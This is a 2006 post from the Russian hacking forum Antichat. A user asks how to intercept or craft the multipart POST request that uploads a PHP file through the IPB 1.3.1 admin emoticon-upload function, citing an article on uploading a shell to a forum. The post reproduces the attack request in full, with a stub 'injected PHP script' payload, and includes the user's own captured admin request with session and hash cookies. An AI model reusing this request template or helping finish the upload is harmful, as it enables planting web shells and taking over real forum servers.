Форум АНТИЧАТ - Naviscope перехват пакета

Naviscope перехват пакета

14.06.2006, 06:35

alex-19841

Познающий

Регистрация: 31.03.2006

Сообщений: 58

Провел на форуме:
163249

Репутация: 1

Naviscope перехват пакета

Здесь есть хорошая статья как залить шелл на форум
http://antichat.ru/txt/IPB/index2.php
Там также дается пример перехваченного пакета

Код:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798; 

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

но у меня переватывается только

Код:

GET http://www.site.ru/forum/admin.php?adsess=adb5bdf51ef7561657e41a0587585012&act=op&code=emo HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.site.ru/forum/admin.php?adsess=adb5bef51ef7563657e41a0587585012
Accept-Language: en-us
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: www.site.ru
Cookie: cnstid=12519652; member_name=user; member_password=as694a33b5945691629dee124b813e33; member_newpm=0; member_id=1; pass_hash=as694a33b5945691629dee124b813e33; member_newpm=0; PHPSESSID=adabe49374adf90a5687a8203c24e50b

можно ли какнибудь также перехватить или где можна найти вот эту часть

Код:

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

IPB v1.3.1
Зарание спасибо

ANTICHAT — форум по информационной безопасности, OSINT и технологиям